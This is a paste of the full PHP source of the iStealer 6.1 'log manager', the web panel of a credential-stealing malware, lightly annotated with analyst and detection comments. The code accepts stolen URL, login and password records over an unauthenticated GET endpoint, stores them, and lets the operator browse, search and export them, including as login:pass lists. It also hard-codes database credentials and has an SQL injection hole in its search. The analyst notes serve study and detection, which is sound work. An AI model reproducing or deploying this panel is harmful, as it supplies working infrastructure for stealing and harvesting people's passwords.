
Untitled

a guest
Aug 16th, 2017
  1. <?php
  // Analyst note: the title and footer strings below identify this file as the
  // "log manager" web panel of iStealer 6.1. The rest of the script stores,
  // lists, searches and exports url/login/password records submitted to it
  // over HTTP.
  2. // CONFIGURATION ******************************************************************************
  3.  
  // Database connection settings are hard-coded in the script source.
  4. $dbHost = "mysql1.050webhost.com"; // MySQL host
  5. $dbUser = "a4249412_admin"; // MySQL username
  6. $dbPass = "admin1"; // MySQL password
  7. $dbDatabase = "a4249412_admin"; // MySQL database name
  8.  
  // Single panel account; the login branch compares these values directly
  // with the POSTed username/password fields.
  9. $username = "admin"; // Login Username
  10. $password = "admin"; // Login Password
  11.  
  12. $logspage = 50; // Number of logs per page
  13.  
  14. // ********************************************************************************************
  15.  
  // HTML fragments that the branches below concatenate into $html.
  16. $html = "<html><head><title>iStealer 6.1 Legends Log manager - ";
  17. $header = "</title><link rel='stylesheet' type='text/css' href='style.css'/></head><body>
  18. <div id='web'><div id='header'><b>Hello, ".$username."</b></div><div id='navigation'><ul>
  19. <li><a href='?action=logs'>Show All Logs</a></li><li><a href='?action=search'>Search</a></li>
  20. <li><a href='?action=exportall'>Export All Logs</a></li>
  21. <li><a href='?action=logout'>Logout</a></li></ul></div><br>";
  22. $footer = "<div id='footer'>iStealer 6.1 Legends - Kizar Labs 2009</div></div></body></html>";
  23. $searchform = "<form name='search' method='POST' action='?action=search'>
  24. Search for: <input type='text' name='q' size='20'> In: <select name='in'>
  25. <option selected='selected' value='1'>Url</option><option value='2'>Login</option>
  26. <option value='3'>Password</option><option value='4'>Computer</option>
  27. <option value='5'>Date</option><option value='6'>Ip</option></select>
  28. <input type='submit' value='Search' name='search'></form>";
  29. $loginform = "<form id='loginform' name='frm' method='POST' action='?action=login'>
  30. <table id='logintable' cellpadding='0' cellspacing='10' border='0'>
  31. <tr><td>Username:</td><td><input type='text' name='username' size='20'></td></tr>
  32. <tr><td>Password:</td><td><input type='password' name='password' size='20'></td></tr>
  33. <tr><td></td><td><input type='submit' value='Login' name='login'></td></tr></form>";
  34. $javascript = "<script language='javascript' type='text/javascript'>
  35. function checkAll() { chk = document.getElementsByName('sel[]');
  36. for (i = 0; i<chk.length; i++) { if (document.frm.elements['check_all'].checked) chk[i].checked = true; else chk[i].checked = false;}}
  37. function checkform() { chk = document.getElementsByName('sel[]'); for (i = 0; i<chk.length; i++) { if (chk[i].checked == true) {
  38. return true;}} alert('At least one option must be select.'); return false; }
  39. function confirmation() { return confirm('Are you sure you want to delete all selected logs?');}</script>";
  // Display names indexed by the numeric `program` column: 19 entries,
  // indexes 0-18, the same range the "add" branch accepts for parameter "a".
  // The list shows which applications' saved credentials the panel expects.
  40. $aplications = array("MSN Messenger", "Google talk", "Trillian/MSN", "Trillian/AIM", "Trillian/Yahoo", "Pidgin/Gaim", "Paltalk Scene", "Steam",
  41. "No-Ip" , "DynDNS", "Firefox", "Internet Explorer", "Google Chrome", "Opera", "IDM", "FileZilla", "FlashFXP", "SmartFtp", "CuteFtp");
  // Column names of the `logs` table, picked by numeric index for sorting
  // (logs branch) and for searching (search branch).
  42. $cols = array("program", "url", "login", "pass", "computer", "date", "ip");
  43.  
  44. // FUNCTIONS ******************************************************************************
  // Opens a MySQL connection with the configured credentials and selects the
  // configured database. On either failure it emits an error page built from
  // the shared HTML fragments and ends the script. Returns the connection.
  // Uses the legacy mysql_* extension, which was removed in PHP 7.
  45. function connect_database() {
  46. global $dbHost, $dbUser, $dbPass, $dbDatabase, $html, $header, $footer;
  47. $mysql = mysql_connect($dbHost, $dbUser, $dbPass);
  48. if (!$mysql) {
  49. $html .= "Database Error".$header."Can not connect to database, please check the configuration.".$footer;
  50. die($html);
  51. }
  52. if (!mysql_select_db($dbDatabase, $mysql)) {
  // The connection is closed before the error page is printed.
  53. mysql_close($mysql);
  54. $html .= "Database Error".$header."Can not select '".$dbDatabase."' database, please check the configuration.".$footer;
  55. die($html);
  56. }
  57. return $mysql;
  58. }
  // Builds the pager markup for the listing: one entry per page, plus a
  // "Results x - y of about n" summary. The current page is read from
  // $_SESSION["page"]. Returns the HTML string.
  59. function pages_number($logstotal, $logspage) {
  60. $pagesnumber = ceil($logstotal/$logspage);
  61. $temp = "Pages: ";
  62. for ($i=0; $i<$pagesnumber; $i++) {
  // The current page is shown as plain text, every other page as a link.
  63. if ($_SESSION["page"] == $i)
  64. $temp .= " <span class='page1'>".$i."</span>";
  65. else
  66. $temp .= " <span class='page0'><a href='?action=logs&page=".$i."'>".$i."</a></span>";
  67. }
  // The upper bound is page start plus page size; it is not clamped to $logstotal.
  68. $temp .= " Results ".($_SESSION["page"]*$logspage)." - ".(($_SESSION["page"]*$logspage)+$logspage)." of about ".$logstotal;
  69. return $temp;
  70. }
  // Maps $_SESSION["order"] to an SQL sort direction keyword:
  // 0 gives "ASC", any other value gives "DESC".
  71. function sort_order() {
  72. if ($_SESSION["order"] == 0) $tmp = "ASC"; else $tmp = "DESC";
  73. return $tmp;
  74. }
  75.  
  76. // TEST *************************************************************************************
  // Health-check endpoint. It is handled before session_start() and the login
  // gate, so it answers without authentication: "Ready" when the `logs` table
  // can be queried, "NoReady" otherwise.
  // Detection note: the two fixed response bodies for ?action=test are a
  // usable fingerprint when confirming that a host serves this panel.
  77. if ($_GET["action"] == "test") {
  78. $mysql = connect_database();
  79. $result = mysql_query("SELECT COUNT(*) FROM `logs`;", $mysql);
  80. if ($result) {
  81. echo "Ready";
  82. } else {
  83. echo "NoReady";
  84. }
  85. mysql_close($mysql);
  86. exit;
  87. }
  88.  
  89. // ADD ***************************************************************************************
  // Ingest endpoint, also handled before the login gate. A GET request with
  // action=add is accepted when these parameters are present:
  //   a = program index (numeric, 0-18), u = url, l = login,
  //   p = password (more than 3 characters), c = computer name.
  // One row is inserted unless a row with the same program/url/login/pass
  // already exists. `date` is the server time and `ip` is the requesting
  // address. The branch always ends the script and prints nothing.
  // Detection note: the submitted values travel in the URL query string, so
  // requests with this parameter set show up in proxy and web-server access
  // logs and can be matched there.
  90. if ($_GET["action"] == "add") {
  91. if (isset($_GET["a"]) && isset($_GET["c"]) && isset($_GET["u"]) && isset($_GET["l"])&& isset($_GET["p"])
  92. && is_numeric($_GET["a"]) && $_GET["a"]>=0 && $_GET["a"]<=18 && strlen($_GET["p"])>3) {
  // Connects directly instead of using connect_database(), so a database
  // failure here ends the script silently rather than printing an error page.
  93. $mysql = mysql_connect($dbHost, $dbUser, $dbPass);
  94. if (!$mysql) exit;
  95. if (!mysql_select_db($dbDatabase, $mysql)) exit;
  // Duplicate check. u, l and p go through urldecode(), htmlspecialchars()
  // and mysql_real_escape_string(); a is used after the numeric range check.
  96. $result = mysql_query("SELECT * FROM `logs` WHERE `program` = '".$_GET["a"]."' AND `url` = '".mysql_real_escape_string(htmlspecialchars(urldecode($_GET["u"])), $mysql).
  97. "' AND `login` = '".mysql_real_escape_string(htmlspecialchars(urldecode($_GET["l"])), $mysql)."' AND `pass` = '".
  98. mysql_real_escape_string(htmlspecialchars(urldecode($_GET["p"])), $mysql)."';", $mysql);
  99. if (!$result) exit;
  100. if (mysql_num_rows($result) == 0) {
  // Values are stored already HTML-escaped, because htmlspecialchars() is
  // applied before the INSERT.
  101. $result = mysql_query("INSERT INTO `logs` (`id`, `program`, `url`, `login`, `pass`, `computer`, `date`, `ip`) VALUES (NULL , '".
  102. $_GET["a"]."', '".mysql_real_escape_string(htmlspecialchars(urldecode($_GET["u"])), $mysql)."', '".
  103. mysql_real_escape_string(htmlspecialchars(urldecode($_GET["l"])), $mysql)."', '".mysql_real_escape_string(htmlspecialchars(urldecode($_GET["p"])), $mysql)."', '".
  104. mysql_real_escape_string(htmlspecialchars(urldecode($_GET["c"])), $mysql)."', '".date("Y-m-d H:i:s")."', '".$_SERVER['REMOTE_ADDR']."');", $mysql);
  105. }
  106. mysql_close($mysql);
  107. }
  108. exit;
  109. }
  110.  
  111. // LOGIN **************************************************************************************
  // Login gate. A request is treated as authenticated only when the session
  // holds the configured username and the client address recorded at login.
  // Otherwise only the login form or a login attempt is served, and every
  // path except a successful login ends the script.
  112. session_start();
  113. if ($_SESSION["user"]!=$username || $_SESSION["ip"]!=$_SERVER["REMOTE_ADDR"]) {
  114. if ($_GET["action"] == "login") {
  115. if (isset($_POST["username"]) && isset($_POST["password"]) && $username==$_POST["username"] && $password==$_POST["password"]) {
  116. session_start();
  117. $_SESSION["user"] = $username;
  118. $_SESSION["ip"] = $_SERVER["REMOTE_ADDR"];
  // Listing defaults: sort index 5 is the `date` column in $cols, order 1
  // means DESC in sort_order(), and the listing starts at page 0.
  119. $_SESSION["sort"] = 5;
  120. $_SESSION["order"] = 1;
  121. $_SESSION["page"] = 0;
  122.  
  // The first successful login doubles as the installer: the `logs` table is
  // created when the count query fails. Forensic note: this CREATE TABLE
  // statement is the schema to expect in a database recovered from this panel.
  123. $mysql = connect_database();
  124. $result = mysql_query("SELECT COUNT(*) FROM `logs`;", $mysql);
  125. if (!$result) {
  126. $result = mysql_query("CREATE TABLE `logs` (`id` INT NOT NULL AUTO_INCREMENT PRIMARY KEY, `program` INT NOT NULL, `url`
  127. VARCHAR(150) NOT NULL, `login` VARCHAR(50) NOT NULL, `pass` VARCHAR(50) NOT NULL, `computer` VARCHAR(50) NOT NULL, `date`
  128. DATETIME NOT NULL, `ip` VARCHAR(15) NOT NULL);", $mysql);
  129. if (!$result) {
  130. $html .= "Database Error".$header."Can not create table 'logs', please check the configuration and your priviledges.".$footer;
  131. die($html);
  132. }
  133. }
  134. mysql_close($mysql);
  135. header("Location: ?action=logs");
  136. } else {
  // Failed login: the form is shown again under the title "Login Error".
  137. $html = "<html><head><title>Login Error</title><link rel='stylesheet' type='text/css' href='style.css'/></head><body>".$loginform."</body></html>";
  138. echo $html;
  139. exit;
  140. }
  141. } else {
  // Any other request without a valid session gets the login form.
  142. $html = "<html><head><title>Login</title><link rel='stylesheet' type='text/css' href='style.css'/></head><body>".$loginform."</body></html>";
  143. echo $html;
  144. exit;
  145. }
  146. }
  147.  
  148. // LOGOUT ************************************************************************************
  // Authenticated action dispatcher. The login gate earlier in the script ends
  // every request that has no valid session, so the branches below serve only
  // the panel operator.
  // Logout: clears the session keys and redirects to index.php.
  149. if ($_GET["action"] == "logout") {
  150. unset($_SESSION["user"]);
  151. unset($_SESSION["ip"]);
  152. unset($_SESSION["sort"]);
  153. unset($_SESSION["order"]);
  154. unset($_SESSION["page"]);
  155. session_unset();
  156. header("Location: index.php");
  157.  
  158. // LOGS **************************************************************************************
  159. } elseif ($_GET["action"] == "logs" || !isset($_GET["action"])) {
  // Paginated listing of all stored records; also the default view when no
  // action is given.
  160.  
  // Sort handling: repeating the current sort index flips the direction,
  // a different index changes the sort column.
  161. if (isset($_GET["sort"]) && $_GET["sort"]>=0 && $_GET["sort"]<=6) {
  162. if ($_SESSION["sort"] == $_GET["sort"])
  163. if ($_SESSION["order"] == 0) $_SESSION["order"] = 1; else $_SESSION["order"] = 0; else $_SESSION["sort"] = $_GET["sort"];
  164. }
  165.  
  166. $mysql = connect_database();
  167. $result = mysql_query("SELECT COUNT(*) FROM `logs`;", $mysql);
  168. $logstotal = mysql_result($result, 0);
  169. if ($logstotal > 0) {
  170. if (isset($_GET["page"]) && is_numeric($_GET["page"]) && $_GET["page"]>=0 && $_GET["page"]<=ceil($logstotal/$logspage))
  171. $_SESSION["page"] = $_GET["page"];
  172.  
  // The sort column comes from $cols via the session's sort index, the
  // direction from sort_order(), and the LIMIT window from the session page.
  173. $result = mysql_query("SELECT * FROM `logs` ORDER BY `".$cols[$_SESSION["sort"]]."` ".sort_order()." LIMIT ".($logspage*$_SESSION["page"])." , ".$logspage.";", $mysql);
  174. if (!$result) die(mysql_error());
  175.  
  176. $html .= "Logs".$header.$javascript."
  177. <form name='frm' method='POST' action='?action=selected' onsubmit='return checkform();'>
  178. <table id='logstable' cellpadding='2' cellspacing='0' border='0'><tr id='row0'>
  179. <td><a href='?action=logs&sort=0'>Program</a></td><td><a href='?action=logs&sort=1'>Url / Host</a></td>
  180. <td><a href='?action=logs&sort=2'>Login</a></td><td><a href='?action=logs&sort=3'>Password</a></td>
  181. <td><a href='?action=logs&sort=4'>Computer</a></td><td><a href='?action=logs&sort=5'>Date</a></td>
  182. <td><a href='?action=logs&sort=6'>Ip</a></td>
  183. <td><input type='checkbox' name='check_all' onClick='checkAll();'></td></tr>";
  // One table row per record, with alternating row classes. Column values
  // are concatenated into the markup as read from the database.
  184. $i = 0;
  185. while ($row = mysql_fetch_array($result)) {
  186. $html .= "<tr class='";
  187. if ($i % 2 == 0) $html .= "row1"; else $html .= "row2";
  188. $html .= "'><td>".$aplications[$row["program"]]."</td>";
  189. $html .= "<td><a href='".$row["url"]."' target='_blanc'>".$row["url"]."</a></td><td>".$row["login"]."</td><td>".$row["pass"]."</td>";
  190. $html .= "<td>".$row["computer"]."</td><td>".$row["date"]."</td><td>".$row["ip"]."</td>";
  191. $html .= "<td><input type='checkbox' name='sel[]' value='".$row["id"]."'></td></tr>";
  192. $i++;
  193. }
  194. $html .= "</table><div id='pages'><div id='numbers'>".pages_number($logstotal, $logspage)."</div><div id='buttons'><input name='buttonact'
  195. type='submit' value='Copy Selected'> <input name='buttonact' type='submit' value='Export Selected'> <input name='buttonact' type='submit'
  196. value='Delete Selected' onclick='if (!confirmation()) return false;'></div></div></form>".$footer;
  197. } else {
  198. $html .= "Logs".$header."No logs found!".$footer;
  199. }
  200. mysql_close($mysql);
  201. echo $html;
  202.  
  203. // SEARCH ************************************************************************************
  204. } elseif ($_GET["action"] == "search") {
  // Search: POST field `in` (1-6) picks the column from $cols (url, login,
  // pass, computer, date, ip) and `q` is the substring matched with LIKE.
  // Without both fields only the empty search form is shown.
  205. if (isset($_POST["q"]) && isset($_POST["in"]) && is_numeric($_POST["in"]) && $_POST["in"]>0 && $_POST["in"]<=6) {
  206. $mysql = connect_database();
  207. $result = mysql_query("SELECT * FROM `logs` WHERE `".$cols[$_POST["in"]]."` LIKE '%".$_POST["q"]."%';", $mysql);
  208. if (!$result) die(mysql_error());
  209.  
  210. if (mysql_num_rows($result) > 0) {
  211. $html .= "Search".$header.$javascript.$searchform."
  212. <form name='frm' method='POST' action='?action=selected' onsubmit='return checkform();'>
  213. <table id='searchtable' cellpadding='2' cellspacing='0' border='0'><tr id='row0'>
  214. <td>Program</td><td>Url / Host</td>
  215. <td>Login</td><td>Password</td>
  216. <td>Computer</td><td>Date</td>
  217. <td>Ip</td>
  218. <td><input type='checkbox' name='check_all' onClick='checkAll();'></td></tr>";
  // Same row rendering as the listing branch, without sorting or paging.
  219. $i = 0;
  220. while ($row = mysql_fetch_array($result)) {
  221. $html .= "<tr class='";
  222. if ($i % 2 == 0) $html .= "row1"; else $html .= "row2";
  223. $html .= "'><td>".$aplications[$row["program"]]."</td>";
  224. $html .= "<td><a href='".$row["url"]."' target='_blanc'>".$row["url"]."</a></td><td>".$row["login"]."</td><td>".$row["pass"]."</td>";
  225. $html .= "<td>".$row["computer"]."</td><td>".$row["date"]."</td><td>".$row["ip"]."</td>";
  226. $html .= "<td><input type='checkbox' name='sel[]' value='".$row["id"]."'></td></tr>";
  227. $i++;
  228. }
  229. $html .= "</table><div id='pages'><div id='numbers'>".mysql_num_rows($result)." results for '".$_POST["q"]."'</div><div id='buttons'>
  230. <input name='buttonact' type='submit' value='Copy Selected'> <input name='buttonact' type='submit' value='Export Selected'>
  231. <input name='buttonact' type='submit' value='Delete Selected' onclick='if (!confirmation()) return false;'></div></div></form>".$footer;
  232. } else {
  233. $html .= "Search".$header.$searchform."<br>No results found!".$footer;
  234. }
  235. mysql_close($mysql);
  236. } else {
  237. $html .= "Search".$header.$searchform.$footer;
  238. }
  239. echo $html;
  240.  
  241. // EXPORT ALL ************************************************************************************
  242. } elseif ($_GET["action"] == "exportall") {
  // Export all: streams every record as a plain-text attachment.
  // Forensic note: the attachment filename is fixed (and says 6.0 although
  // the page title says 6.1), so a file of that name may be an artefact on a
  // machine that used this panel. TODO confirm against other samples.
  243. header("Content-Type: text/plain");
  244. header("Content-Disposition: Attachment; filename=iStealer_6.0_export.txt");
  245. header("Pragma: no-cache");
  246.  
  247. $mysql = connect_database();
  248. $result = mysql_query("SELECT * FROM `logs`;", $mysql);
  249. if (!$result) die(mysql_error());
  250.  
  // Export record layout: seven labelled lines followed by a dashed separator.
  251. while ($row = mysql_fetch_array($result)) {
  252. echo "Program:\t".$aplications[$row['program']]."\r\n";
  253. echo "Url/Host:\t".$row['url']."\r\n";
  254. echo "Login:\t\t".$row['login']."\r\n";
  255. echo "Password:\t".$row['pass']."\r\n";
  256. echo "Computer:\t".$row['computer']."\r\n";
  257. echo "Date:\t\t".$row['date']."\r\n";
  258. echo "Ip:\t\t\t".$row['ip']."\r\n";
  259. echo "----------------------------------------------------------\r\n";
  260. }
  261. mysql_close($mysql);
  262.  
  263. // SELECTED **************************************************************************************
  264. } elseif ($_GET["action"] == "selected") {
  // Bulk actions on the record ids ticked in the listing (POST field sel[]).
  // The label of the submit button that was pressed selects the action.
  // Nothing is output when the fields are missing or the label is unknown.
  265. if (isset($_POST["buttonact"]) && isset($_POST["sel"]) && count($_POST["sel"])!=0) {
  266.  
  267. // DELETE SELECTED ***********************************************************************
  268. if ($_POST["buttonact"] == "Delete Selected") {
  269. $mysql = connect_database();
  // The WHERE clause is built as "`id` = N OR ..." from the numeric ids only;
  // the trailing " OR" is removed by the str_replace() below.
  270. $query = "DELETE FROM `logs` WHERE";
  271. for ($i=0; $i<count($_POST["sel"]); $i++) {
  272. if (is_numeric($_POST["sel"][$i]))
  273. $query .= " `id` = ".$_POST["sel"][$i]." OR";
  274. }
  275. $query .= ';';
  276. $query = str_replace(' OR;', ';', $query);
  277. $result = mysql_query($query, $mysql);
  278. if (!$result) die(mysql_error());
  279. mysql_close($mysql);
  280. header("Location: ?action=logs");
  281.  
  282. // EXPORT SELECTED ***********************************************************************
  283. } elseif ($_POST["buttonact"] == "Export Selected") {
  // Same attachment headers and record layout as the export-all branch,
  // limited to the selected ids.
  284. header("Content-Type: text/plain");
  285. header("Content-Disposition: Attachment; filename=iStealer_6.0_export.txt");
  286. header("Pragma: no-cache");
  287. $mysql = connect_database();
  288. $query = "SELECT * FROM `logs` WHERE";
  289. for ($i=0; $i<count($_POST["sel"]); $i++) {
  290. if (is_numeric($_POST["sel"][$i]))
  291. $query .= " `id` = ".$_POST["sel"][$i]." OR";
  292. }
  293. $query .= ';';
  294. $query = str_replace(' OR;', ';', $query);
  295. $result = mysql_query($query, $mysql);
  296. if (!$result) die(mysql_error());
  297. while ($row = mysql_fetch_array($result)) {
  298. echo "Program:\t".$aplications[$row['program']]."\r\n";
  299. echo "Url/Host:\t".$row['url']."\r\n";
  300. echo "Login:\t\t".$row['login']."\r\n";
  301. echo "Password:\t".$row['pass']."\r\n";
  302. echo "Computer:\t".$row['computer']."\r\n";
  303. echo "Date:\t\t".$row['date']."\r\n";
  304. echo "Ip:\t\t\t".$row['ip']."\r\n";
  305. echo "----------------------------------------------------------\r\n";
  306. }
  307. mysql_close($mysql);
  308.  
  309. // COPY SELECTED *************************************************************************
  310. } elseif ($_POST["buttonact"] == "Copy Selected") {
  // Renders the selected records as "login:pass" pairs, one per line, in a
  // single table cell.
  311. $mysql = connect_database();
  312. $query = "SELECT `login`, `pass` FROM `logs` WHERE";
  313. for ($i=0; $i<count($_POST["sel"]); $i++) {
  314. if (is_numeric($_POST["sel"][$i]))
  315. $query .= " `id` = ".$_POST["sel"][$i]." OR";
  316. }
  317. $query .= ';';
  318. $query = str_replace(' OR;', ';', $query);
  319. $result = mysql_query($query, $mysql);
  320. if (!$result) die(mysql_error());
  321. $html .= "Copy".$header."<table id='searchtable' cellpadding='2' cellspacing='0' border='0'><tr class='row1'><td>";
  322. while ($row = mysql_fetch_array($result))
  323. $html .= $row['login'].":".$row['pass']."<br>";
  324. mysql_close($mysql);
  325. $html .= "</td></tr></table><br>".$footer;
  326. echo $html;
  327. }
  328. }
  329. } else {
  // Any other action value ends up here.
  330. $html .= "Unexpected Error".$header."Unexpected Error".$footer;
  331. echo $html;
  332. }
  333. ?>